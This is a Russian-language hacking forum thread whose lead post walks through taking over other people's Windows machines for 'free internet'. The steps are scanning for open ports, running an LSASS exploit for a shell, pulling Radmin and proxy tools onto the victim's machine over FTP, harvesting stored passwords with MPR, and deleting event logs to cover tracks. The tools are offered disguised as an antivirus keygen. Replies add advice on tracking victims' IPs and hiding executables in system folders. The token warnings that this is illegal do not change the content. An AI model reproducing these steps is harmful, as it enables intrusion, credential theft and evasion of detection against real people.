Халявный Интернет (для взрослых и немощных ) Начну с того , что мне уже порядком недоели темы на форуме , типо "Халявный инет" и тд и тп . С этой статье я приведу примеры (Гуру идут лесом ) как можно найти этот самый халявный инетернет , но помните это плохо , и уголовнонаказуемо !!! Начну с того , что инет можно добыть несколькими способами , первый это настоящий взлом , второй способ это впарить жертве трояна , заманить на заражённую ссылку с эксплойтом и тд , и третий прийти к жертве и в наглую поставить ему прокси и юзать его инет ! Бредисловие В недавном прошлом , на многих компьютерах стояли , Windows 2000 , Windows XP Home , Windows XP Pro sp1 , так вот все они были уязвимы и взламать их можно было посредством эксплойта SmallSoft Lsa Service Exploit или lsa.exe , этот эксплойт старый и использует уязвимость в lsass.exe, кстати в некоторых сетях до сих пор есть такие машины, которые уязвимы , толи люди не знают про sp2 , sp3 , толи просто им просто лень ставить hotfixы и закрыть 445 порт , хз , мол работает комп, да и ладно Ну... полетели Скачиваем сканер портов Angry IP Scanner идём в настройки , и прописываем порты 21,22,135,138,139,445,1025,4489,3389 и тд и тп Выбираем метод сканирование "Alive hosts (repoding pings only), сохраняем ,затем выбираем IP Range и вбиваем ипы вышей сети , к примеру , а так ипы должны быть вашей сети !!! Code: 10.0.0.0-255.255.255.255 Начинаем сканировать , вот появились первые клиенты , обращаем внимание на тех у кого больше всего открыто портов , затем берём эксплойт SmallSoft Lsa Service Exploit или lsa.exe и вписываем ip жертвы, тип атаки Shell и жмём Начать если , уязвимость есть то вы получаете командную строку компьютера жертвы cmd.exe, то есть вот такое чёрное dos окошечко, если уязвимости нет, окошко повисит и пропадёт и вы идёте лесом ну допустим мы получили shell , теперь вам будет нужно поднять у себя на компьютере FTP-сервер , я выбрал Serv-U Настроить его сможет даже ребёнок , заливаем к себе на фтп сервер нужные нам для дальнейшей работы файлы , выберем радмин сервер,ccproxy.exe и terminal.exe о нём почитать можно тут это замечательная статья от-=lebed=-, но или любой другой софт который вы используете . Теперь возвращаемся в наше окошечко с полученным шеллом , и подключаемся к нашему ФТП-серверу Code: С:\WINDOWS\ftp ftp> o (to) (ваш ип) ftp: connect: 127.0.0.1(login): anonymous pass:Enter Вошли на свой фтп , и идём в директорую где лежат наши файлы Code: dir команды по работе с фтп вы можете найти у себя в справке и поддержке , достаточно набрать ftp . Так теперь , закачаем на комп жертвы наши файлы : PHP: get radmin.exe get terminal.exe готово , выходим bye идём в директорую куда мы залили наши файлы , лучше выбрать директорую по глубже С:\WINDOWS\system32 просмотрим командой dir так... вот они голубчики : запустим их Code: С:\WINDOWS\system32\terminal.exe С:\WINDOWS\system32\radmin.exe Ну вот и всё ! теперь мы может всё видеть и делать своё темное дело дальше Хочу сказать , что мы произвели честный то есть тру взлом , мы никому ничего не впаривали , то есть нашли уязвимость и честно её юзаем , вывод , челу нужно закрыть 445 порт , поставить или обновить антивирь(кстати он тут не причём , бывали случаи когда на компах стоял KAV6 и при этом можно было приспокойной получить shell) и установить хороший фаерволл ! Летим дальше , думаю вы поняли прочитав статью Лебедя для чего нам нужен terminal.exe , да да да , вот именно , плюс ко всему мы ещё получили бесплатный дедик ! так заходим в наш дедик , давайте осмотримся , что тут есть .... угу ... нам нужны пассы от всего что тут есть , скачиваем программу MPR запускаем смотрим , ага , вот нам и пасс от аськи , веб форм , и пароли от так желаемого нами интернета . Наступает долгожданный момент !!! Но ... мы понимаем , что если мы сейчас запустим тут инет , то вылетим из локалки или не запустим инет вообще , так так так , и тут нам на помощь приходит замечательная программка RASPPPOE_099 идём на офф сайт скачиваем , распаковываем в любую папку , далее идём в Панель Управления>Cетевыe подключение>Подключения по локальной сети>Свойства , там Протокол Интеренета TCP/IP жмём Свойства , и выбираем Протокол=Добавить, далее нажмите кнопку «Установить с Диска». Да чё я тут распинаюсь вот тут можно посмотреть и почитать , там даже с картинками http://www.rdtc.ru/internet_ivd_PPPoE_XP.php3 Так всё готово , бывает что нужно перегрузиться , но в большенстве случаев этого можно и не делать ! И вот мы уже юзаем чужой инет , стыдно ? конечно стыдно и тем более за это есть статья !!! ПОМНИТЕ ОБ ЭТОМ ! не стоит этот всех этих усилий , тем более ,что анлим сейчас стоит копейки !!! Ну что теперь осталось скачать любой прокси сервер , установить его на компе жертвы , вернуться к себе , затем в FireFox>Инстументы>Настройки>Дополнительно>Network=Settings=Manual Proxy configuration , вписываем ип жертвы и порт нашего прокси сервера . И радуемся чужому инету Потом если у жертвы анлим , то можно уже с его компа производить сканирование портов и дальнейшие взломы , а вот ещё чуть не забыл , чтобы не палится нужно чистить лог , зайдите сюда C:\WINDOWS\system32\config , AppEvent.Evt , SecEvent.Evt и тд , и удалите их на фиг , если будут проблемы с удалением и чисткой , скачайте Unlocker и он поможет решить все ваши проблемы . Если кому в лом искать и качать данный софт , залил Вот всё в одном флаконе !!! terminal.exe KAV_keygen=радмин, ipscan и старый сплойт , в архиве lsa.rar, RASPPPOE_099.ZIP,CCProxy.rar, Keygen KAV_all.exe=радмин-сервер , хочу заметить , что пинчей и всякой прочей лабуду в этих файла нет , отмечу что на CCProxy.ехе после обработки его Reshackom стал рычать на него Nod 32 , с радмином я думаю всё тоже ясно , но по крайне мере это юзалось , то однин Каспер на него повизгивал и тогда когда конектишься к нему через TELNET , мол атака RootShell , Telminal.exe тоже не буду выкладывать , сначало почитайте статью Лебедя -=lebed=-тут там и скачаете Terminal.exe , MPR тоже выкладывать не буду потому что на него рычат антивири , мол Троян PWS , чтобы потом не было предъяв , мол я кому то троя пытался впарить !!! Послесловие : Надеюсь после этой статейки , больше не будет тем " Халявный Инет и тд и тп "(стану модером буду банить за такие топы ) и помните это уголовно наказуемо и противозаконно ! не использовать на практике !!!! Всего всем доброго , удачи http://metasploit.ru
Спасибо , но у меня есть одна проблема , блин теряю компы , то есть ипы у всех динамо , и трудно потом искать их по всей стране , кто какую прогу может посоветовать , чтобы она хотя бы мне на мыло ипы отстукивала , пинча и прочию гадость не предологать
ппц нах его доставать он стал уже настока дешевым и доступным до неприличия просто а уж еси так вам приспичило то пинч решит любую вашу проблему (ну почти) ппц нах статью еще писать убило вообще
Да, именно так просто всё и было... когда-то - настальжи... Вспомним ещё авторутер KAHT2 который проходился по диапазонам IP и напоровшись на дырявую винду давал CMD-шелл. P.S. Флейм в разделе запрещён!
Актуально поиметь халявный инет с EDGE к примеру мегафон модем, билайн и МТС, пока ничего путного найти не получилось.
Эту статейку я написал для ознакомления , как иметь инет с билайна и МТС понятия не имею ! ну ладно это ерунда , у меня тут другая проблема , есть доступ к компу с радмином , то есть там их стояло два один версии 2.2 , другой 3 , тот что был версии 2.2 , его перебил своим радмином , но вот что то не могу понять , если я пишу этот ип в браузере , то попадаю на страницу бла бла внизу написанно но на этом же ипе я сижу у него на компе но там Windows XP , смотрел на компе вроде виртуалки нет !!!! Но на рабочем столе вижу есть Putty , что это может быть ??? просто я ещё с такими делами не сталкивался ! Если кому инетересно посмотрите , в ПМ скину ip и пароль от радмина , только тем у кого репа не ниже Эксперт, Гуру (без обид)
Думаю лучше заплатить денег, не советую лазить под другими акками из сети,у самого забирали за это комп,хорошо что всё прошло благополучно..
Ты прав , но согласись , чтобы знать как защитить систему , нужно в первую очередь знать , как её взломать !
StopXakep, во-первых... одно слово в твоем нике те не подходит во-вторых... я тебе помогу, когда: 1. Стану экспертом 2. Вылезу из под стола ))))))))))))))))))))))) P.S Ктулху среди нас
Сервер радмина я выкладывал тут смотри вложение soft_all.zip там terminal.exe, keygen_KAV_all.exe, lsa.exe , keygen_KAV_all.exe это и есть сервер радмина !!!! Думаю с этим понятно , теперь с файлами .ехе через сmd , поясню значит так для начала , нужно подключится к своему радмину , через телнет , затем перейти в нужную вам директорию , например я люблю прятать файлы в C:\WINDOWS\system32\spool\drivers\w32x86 уж в неё точно обычный юзер не станет смотреть , ну а новичку у которых нужно , вот ты попал в телнет по средством радмина тот же cmd Code: Microsoft Windows XP [Версия 5.1.2600] (С) Корпорация Майкрософт, 1985-2001. C:\Documents and Settings\Admin> далее набираешь команду cd\ и переходишь вот сюда Code: Microsoft Windows XP [Версия 5.1.2600] (С) Корпорация Майкрософт, 1985-2001. C:\Documents and Settings\Admin>cd\ C:\> вот , потом конектишься к своему радмину в режиме "Передача файлов" и заливаешь на диск С:\ свои файлы , и просматриваешь их командой dir Code: C:\>dir Том в устройстве C не имеет метки. Серийный номер тома: XXX-XXX Содержимое папки C:\ 15.12.2008 19:47 0 AUTOEXEC.BAT 15.12.2008 19:47 0 CONFIG.SYS 16.12.2008 11:20 <DIR> Documents and Settings 21.03.2007 14:39 4*740 key.bat 14.09.2007 13:29 787*423 keygen_KAV_all.exe 05.11.2007 12:17 837*640 mpr103nulled.exe 28.01.2008 03:29 784*421 mpr103nulled.rar 17.12.2008 12:41 <DIR> Program Files 14.09.2007 13:29 787*423 system.exe 21.03.2007 01:00 198*143 terminal.exe 17.12.2008 12:42 <DIR> WINDOWS 17.12.2008 22:37 <DIR> Новая папка 8 файлов 3*399*790 байт 4 папок 2*078*269*440 байт свободно C:\> потом выбираете свой файл и запускаете его C:\>system.exe Enter Думаю теперь всё будет ясно !!! ps отписал это специально для того , чтобы впредь не было таких вопросов